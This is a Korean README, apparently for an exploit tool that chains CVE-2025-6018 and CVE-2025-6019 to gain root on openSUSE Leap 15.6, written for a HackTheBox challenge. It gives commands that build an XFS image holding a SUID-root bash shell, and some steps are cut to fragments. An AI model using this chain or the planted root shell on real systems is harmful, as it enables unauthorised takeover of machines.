
권한 상승 익스플로잇 체인 (CVE-2025-6018 + CVE-2025-6019) - openSUSE Leap 15.6 대상
이 익스플로잇은 openSUSE Leap 15.6을 대상으로 한 HackTheBox 챌린지를 해결하기 위해 개발되었습니다.
이 익스플로잇은 Qualys 보안 팀의 원본 연구를 기반으로 합니다:
추가 참조 구현:
이 익스플로잇은 두 가지 취약점을 연결하여 openSUSE Leap 15.6에서 권한 없는 사용자에서 root로 로컬 권한 상승을 달성합니다:
익스플로잇에는 SUID bash 바이너리가 포함된 사전 생성된 XFS 파일시스템 이미지가 필요합니다. 이는 root 권한이 있는 Linux 머신에서 생성해야 합니다:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
이미지가 올바르게 생성되었는지 확인:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment 생성익스플로잇이 실패할 경우:
file xfs.imagesystemctl status udisks2이 익스플로잇은 교육 목적 및 승인된 보안 테스트 전용입니다. 책임감 있게 사용하고 테스트 권한이 있는 시스템에서만 사용하세요.